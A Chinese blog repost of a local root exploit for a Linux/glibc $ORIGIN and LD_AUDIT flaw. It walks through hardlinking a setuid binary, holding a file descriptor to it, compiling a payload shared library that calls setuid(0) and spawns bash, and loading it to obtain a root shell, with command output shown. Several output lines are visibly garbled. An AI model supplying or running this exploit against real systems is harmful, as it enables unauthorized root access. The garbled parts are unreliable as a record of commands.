Linux2.6内核EXP

It is possible to exploit this flaw to execute arbitrary code as root.

Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.

Exploitation would look like the following.

Create a directory in /tmp we can control.

$ mkdir /tmp/exploit

$ ln /bin/ping /tmp/exploit/target

Open a file descriptor to the target binary (note: some users are surprised

to learn exec can be used to manipulate the redirections of the current

shell if a command is not specified. This is what is happening below).

$ exec 3< /tmp/exploit/target

This descriptor should now be accessible via /proc.

lsl/proc/ l s − l / p r o c / $/fd/3

lr-x—— 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target*

Remove the directory previously created

$ rm -rf /tmp/exploit/

lsl/proc/ l s − l / p r o c / $/fd/3

lr-x—— 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target (deleted)

Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().

$ cat >payload.c

void  __attribute__((constructor))   init()

{

            setuid(0);

            system("/bin/bash");

}

此处有一个回车

(此处ctrl+c结束 )

$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

$ ls -l /tmp/exploit

-rwxrwx—1taviso taviso 4.2K Oct 1509:22/tmp/exploit*

$ LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3

sh-4.1# whoami

root sh-4.1# id

uid=0(root)gid=500(taviso)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值